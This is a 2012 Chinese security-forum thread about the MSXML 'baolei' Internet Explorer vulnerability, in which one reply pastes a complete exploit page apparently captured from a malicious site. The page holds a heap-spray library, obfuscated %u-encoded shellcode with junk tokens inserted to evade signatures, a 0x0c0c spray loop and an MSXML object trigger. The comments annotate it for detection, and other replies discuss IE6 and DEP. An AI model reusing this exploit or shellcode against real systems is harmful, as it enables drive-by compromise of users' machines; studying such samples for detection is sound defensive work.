[转帖]关于“暴雷”漏洞 利用样本
发表于: 2012-6-30 18:12 7425


RB
                    不懂网络，希望科普。
               msxml_get_definition_code_exec.rar


这个样本比较早了，不过没过 DEP，只对 IE6、7 有用。Metasploit 上有新的样本，据说对 IE8 管用，能过 DEP。现在对 IE 开内存写数据并执行的，似乎也就 JIT spray 好用些。
2012-7-1 16:59
今天毒网上抓了一个
<html> 
<head> 
<script> 
// Namespace holder for the IE heap helper below; never instantiated itself.
function heapLib() {
}
// Constructor for the IE heap-manipulation helper. In JS terms it is pure
// bookkeeping: string allocations are kept alive in `this.mem`, grouped by a
// caller-chosen tag, so a whole group can be dropped at once.
//   maxAlloc - bound for the padding string's "size" (default 65535)
//   heapBase - base address used by lookasideAddr() (default 0x150000)
heapLib.ie = function(maxAlloc, heapBase) {
    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
    this.heapBase = (heapBase ? heapBase : 0x150000);
    // Grow a reusable padding string by doubling until 4 + 2*len + 2 reaches
    // maxAlloc. The same formula is the "size" allocOleaut32() checks below
    // (4-byte prefix + UTF-16 data + 2-byte terminator - consistent with an
    // OLE BSTR, which the OLEAUT32 naming suggests; not verified here).
    this.paddingStr = "AAAA";
    while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
        this.paddingStr += this.paddingStr;
    }
    this.mem = new Array();
    // Primes the allocator state immediately (see flushOleaut32()).
    this.flushOleaut32();
}

// Debug hook: the atan2 result is thrown away, so in plain JS this does
// nothing; the 0xbabe constant presumably lets an attached debugger or
// tracer recognise the call. No-op Math calls with a fixed constant like
// this are an easy static signature for the library.
heapLib.ie.prototype.debug = function(msg) {
    Math.atan2(0xbabe, msg);
};

// Second debug hook: picks atan or asin on the flag and calls it with the
// 0xbabe marker, discarding the result. The loose `==` is kept on purpose so
// any value that coerces equal to true selects the atan branch, as before.
heapLib.ie.prototype.debugHeap = function(enable) {
    var hook = (enable == true) ? Math.atan : Math.asin;
    hook(0xbabe);
};

// Third debug hook; `msg` is accepted but never used. The acos call with the
// 0xbabe marker is the only effect, and its result is discarded.
heapLib.ie.prototype.debugBreak = function(msg) {
    Math.acos(0xbabe);
};

// Returns the first `len` characters of the padding string built by the
// constructor. Throws a plain string (not an Error, like the rest of this
// library) when more is requested than is available.
heapLib.ie.prototype.padding = function(len) {
    var available = this.paddingStr.length;
    if (len > available) {
        throw "Requested padding string length " + len + ", only " + available + " available";
    }
    return this.paddingStr.substr(0, len);
};

// Rounds `num` up to the next multiple of `round`. Throws a plain string when
// `round` is 0 (loose `==`, so "0" and false count too). parseInt on the
// numeric quotient is kept deliberately: it reproduces the original
// truncation behaviour exactly, including its quirks for very large values.
heapLib.ie.prototype.round = function(num, round) {
    if (round == 0) {
        throw "Round argument cannot be 0";
    }
    var bumped = num + (round - 1);
    var whole = parseInt(bumped / round);
    return whole * round;
};

// Upper-case hexadecimal rendering of a non-negative integer, left-padded
// with "0" to `width` characters (no padding when `width` is falsy). Digits
// are produced low nibble first and prepended, so the loop ends once the
// remaining value fits in a single nibble. Negative input yields one digit,
// because the `> 0xF` test is false from the start.
heapLib.ie.prototype.hex = function(num, width) {
    var DIGITS = "0123456789ABCDEF";
    var remaining = num;
    var out = DIGITS.charAt(remaining & 0xF);
    while (remaining > 0xF) {
        remaining >>>= 4;
        out = DIGITS.charAt(remaining & 0xF) + out;
    }
    var minWidth = width ? width : 0;
    while (out.length < minWidth) {
        out = "0" + out;
    }
    return out;
};

// Renders a 32-bit value as two UTF-16 code units via unescape("%uXXXX"),
// low 16 bits first. That ordering presumably makes the string's in-memory
// UTF-16 form match the little-endian byte order of the value; the file
// does not verify this itself.
heapLib.ie.prototype.addr = function(addr) {
    var low = this.hex(addr & 0xFFFF, 4);
    var high = this.hex((addr >> 16) & 0xFFFF, 4);
    return unescape("%u" + low + "%u" + high);
};

// Records one allocation under `tag`. `arg` is either a string (kept as a
// copy) or a byte size (kept as a padding string of (arg-6)/2 characters,
// the inverse of the 4 + 2*len + 2 size formula). Throws a plain string if
// the resulting size is not a multiple of 16.
heapLib.ie.prototype.allocOleaut32 = function(arg, tag) {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";
    // A missing tag is not rejected: it lands under the property "undefined".
    if (this.mem[tag] === undefined)
        this.mem[tag] = new Array();
    if (typeof arg == "string" || arg instanceof String) {
        // substr(0, length) is an equal string; presumably done so the engine
        // materialises a separate copy rather than sharing the reference.
        this.mem[tag].push(arg.substr(0, arg.length));
    }
    else {
        this.mem[tag].push(this.padding((arg-6)/2));
    }
}

// Drops every string recorded under `tag` and asks the engine to collect.
// CollectGarbage() is a JScript (IE-only) global, so this library cannot run
// in other engines. An explicit CollectGarbage() next to loops that build
// large strings is a common heap-spray indicator for page-content detection.
heapLib.ie.prototype.freeOleaut32 = function(tag) {
    delete this.mem[tag];
    CollectGarbage();
}

// Releases the "oleaut32" group, then allocates six rounds of 32/64/256/32768
// byte blocks under that same tag. alloc() refuses exactly these four sizes
// with a message about the OLEAUT32 cache, so the rounds are evidently meant
// to keep that cache occupied; the count of six is a hard-coded assumption.
heapLib.ie.prototype.flushOleaut32 = function() {
    this.debug("Flushing the OLEAUT32 cache");
    this.freeOleaut32("oleaut32");
    for (var i = 0; i < 6; i++) {
        this.allocOleaut32(32, "oleaut32");
        this.allocOleaut32(64, "oleaut32");
        this.allocOleaut32(256, "oleaut32");
        this.allocOleaut32(32768, "oleaut32");
    }
}
// Public allocation entry point: same string/size handling as allocOleaut32(),
// but the four sizes reserved by flushOleaut32() are rejected first. The page
// calls this with a single argument, so those allocations are untagged.
heapLib.ie.prototype.alloc = function(arg, tag) {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if (size == 32 || size == 64 || size == 256 || size == 32768)
        throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
    this.allocOleaut32(arg, tag);
}
// Releases one tag, then refills the reserved sizes via flushOleaut32().
heapLib.ie.prototype.free = function(tag) {
    this.freeOleaut32(tag);
    this.flushOleaut32();
}

// Forces a collection (IE-only CollectGarbage()) and then refills the
// reserved sizes. Called once by the page before its allocation loop.
heapLib.ie.prototype.gc = function() {
    this.debug("Running the garbage collector");
    CollectGarbage();
    this.flushOleaut32();
}

// Allocates `count` pairs of (untagged, "freeList"-tagged) copies of `arg`,
// one extra untagged copy, then frees only the tagged ones. The untagged
// copies sit under the property "undefined" and are never released here.
// `count` defaults to 1 for any falsy value, including an explicit 0.
// Not called anywhere in this listing.
heapLib.ie.prototype.freeList = function(arg, count) {
    var count = (count ? count : 1);
    for (var i = 0; i < count; i++) {
        this.alloc(arg);
        this.alloc(arg, "freeList");
    }
    this.alloc(arg);
    this.free("freeList");
}

// Allocates `count` copies of `arg` under "lookaside" and frees them again.
// The size must be a multiple of 16 and size+8 must stay below 1024 (the
// message quotes 1008 as the maximum). `count` defaults to 1 for any falsy
// value. Not called anywhere in this listing.
heapLib.ie.prototype.lookaside = function(arg, count) {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";
    if (size+8 >= 1024)
        throw("Maximum lookaside block size is 1008 bytes");
    var count = (count ? count : 1);
    for (var i = 0; i < count; i++)
        this.alloc(arg, "lookaside");
    this.free("lookaside");
}

// Predicts an address for a block of the given size from heapBase plus two
// hard-coded constants (0x688 base offset, 48 bytes per 8-byte size step).
// These encode an assumption about one specific allocator layout; nothing in
// this file derives or checks them. Same size rules as lookaside().
// Not called anywhere in this listing.
heapLib.ie.prototype.lookasideAddr = function(arg)
{
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";
    if (size+8 >= 1024)

        throw("Maximum lookaside block size is 1008 bytes");
    return this.heapBase + 0x688 + ((size+8)/8)*48;
}

// Builds a `size`-byte string (default 1008, must be a multiple of 16): a
// fixed 4-byte prefix, 31 copies of addr(jmpecx), the fixed marker
// "%u0028%u0028", `shellcode`, then padding to fill the remainder. The
// shellcode is limited to size-138 bytes. Not called by this page's scripts,
// and it references `heap.padding(...)` although no `heap` exists in this
// listing (the instance is named `heap_obj`), so calling it as pasted would
// throw a ReferenceError.
heapLib.ie.prototype.vtable = function(shellcode, jmpecx, size) {
    var size = (size ? size : 1008);
    if ((size & 0xf) != 0)
        throw "Vtable size " + size + " must be a multiple of 16";
    if (shellcode.length*2 > size-138)
        throw("Maximum shellcode length is " + (size-138) + " bytes");
    // 124/4 == 31 iterations of the 4-byte address below.
    var vtable = unescape("%u9090%u7ceb")
    for (var i = 0; i < 124/4; i++)
        vtable += this.addr(jmpecx);
    vtable += unescape("%u0028%u0028") + shellcode + heap.padding((size-138)/2 - shellcode.length);
    return vtable;
}

// --- Spray setup, runs at page load ---------------------------------------
// The payload strings are %u-escaped and carry junk tokens ("ckwm",
// "ckwmayt") that are stripped with replace() just before unescape(): a
// simple signature-evasion trick, and itself a useful detection heuristic.
var heap_obj = new heapLib.ie(0x20000);
var scytxtv = "%ud5db%uc9c9%u87cd%u9292%u8f8f%u938f%u8e8a%u8c93%u8f85%u8f93%u8d88%ud992%ucad2%u92d3%ud1c4%ud893%ud8c5%ubdbd%ubdbd";
var scwapx = "%ckwmuBckwmDBckwmD%uBDBckwmD%uBDBckwmD%uBDBD%uBDBckwmD%uBckwmDBD%uBDBckwmD%uBDBckwmD%uEAEA";
var scwapx88 = (scwapx.replace(/ckwm/g,""));
// NOTE: as pasted, the next literal is split across two lines (a forum
// line-wrap), so the listing as shown does not parse; left untouched.
var scwapx99 = "%u54FF%uBEA3%uBDckwmBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uckwmBDBC%u36BD%uD7ckwm55%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDckwmD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%ufaE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDckwmBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7ckwmB9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBckwmDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7ckwmBD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCBckwm42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u66ckwm8E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34Bckwm5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDckwmED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDckwmB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADckwmFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u55ckwm85%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1Bckwm55%uBDBD%u7EBD%u1D55%uBDckwmBD%u0ckwm5BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u5ckwm13C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CckwmC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AckwmD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1
FD%uCD36%u10A1%uD5ckwm36%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ckwmED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42ckwmEA%uB9ckwmEB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%ckwmuBCE2%u7ADB%uB8FA%u5D42%uEE7E%u61ckwm36%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC93ckwm6%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%ckwmuBE10%u8E78%uB266%uAD03%u6Bckwm87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u36ckwm60%u3ckwm6B9%u78ckwmBE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uckwmD919%u2E5ckwm2%u59ckwm8F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uBckwm0DB%uFE42%u1103%uC066%u18ckwm4D%uEF27%u1A43%u8367%u0BckwmA0%u0584%u69ckwmD4%u03A6%uckwmDBC2%u411D%u8A14%u25ckwm10%uckwmAckwmDB7%ckwmu3D45%u12ckwm6B%u4627%uA8EE";
var scwapx98 = (scwapx99.replace(/ckwm/g,""));
var scwapx123 = "%u58ckwmayt58%u58ckwmayt58%u10ckwmaytEB%u4Bckwmayt5B%uC9ckwmayt33%uB9ckwmayt66%u03ckwmaytB8%u34ckwmayt80%uBDckwmayt0B%uFAE2%u05ckwmaytEB%uEBckwmaytE8%uFFckwmaytFF";
var scwapx1 = (scwapx123.replace(/ckwmayt/g,""));
// "MXMZ" -> "%u" yields "%u0c0c%u0c0c": the 0x0c0c fill pattern that the
// second script on this page also uses for its src string.
var woxinxuelaichao = "MXMZ0c0"+"cMXMZ0c0"+"c";
var code = unescape(scwapx1+scwapx98+scytxtv+scwapx88);
var nops = unescape(woxinxuelaichao.replace(/MXMZ/g,'%u'));
// Grow the filler to at least 0x80000 UTF-16 units by doubling.
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, 0x100);
// One unit: 0x100 filler chars, the payload, filler up to 0x800 chars; the
// unit is then doubled to at least 0x40000 chars.
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
// (0x80000-6)/2 chars makes 4 + 2*len + 2 == 0x80000, the size alloc() checks.
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
// 0x22f untagged copies of a 0x80000-byte block: the large, repeated
// allocation loop that heap-spray detection rules key on.
for (var z=1; z < 0x230; z++) {
	heap_obj.alloc(block);
}
</script>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
<script>
// --- Trigger, runs after the <object> in the body is created --------------
// The element is the <object> declared above; its classid is consistent with
// MSXML, and the thread's attachment name (msxml_get_definition_code_exec)
// together with the definition() call below identify the bug being hit.
// For a content-detection rule, an <object> with this classid plus a
// `.definition(` call and a %u0c0c-filled string is the pattern to match.
var obj = document.getElementById('vwtI').object;
// Build a string of repeated 0x0c08/0x0c0c units to at least 0x1002 chars,
// prefix it with the literal "\\\\xxx" (two backslashes at runtime,
// presumably to resemble a UNC path), then cut it to 0x1000-10 chars.
var src = unescape("%u0c08%u0c0c");
while (src.length < 0x1002) src += src;
src = "\\\\xxx" + src;
src = src.substr(0, 0x1000 - 10);
// The string is fed through an <img> src and nameProp is read; the result of
// the read is unused, so this presumably only makes IE process the string.
var pic = document.createElement("img");
pic.src = src;
pic.nameProp;
// Method call on an object into which nothing has been loaded anywhere in
// this listing; 795 is a hard-coded argument whose meaning is not derivable
// from this page.
obj.definition(795);
</script>
</body>
</html>
2012-7-3 01:51
问一下楼上的大哥，你是做什么工作的？
2012-7-3 14:04
国内网站被挂的暴雷漏洞利用代码基本上都是针对 IE6 的，都没用 ROP，所以 IE7、8 都没啥事。
只能怪国内黑客太不争气
2012-7-3 22:51
国内IE6占有率仍然居高不下
2012-7-6 10:52
无业人士
2012-7-6 10:54
IE7 的 DEP 貌似也是不开的吧？
2013-1-3 14:47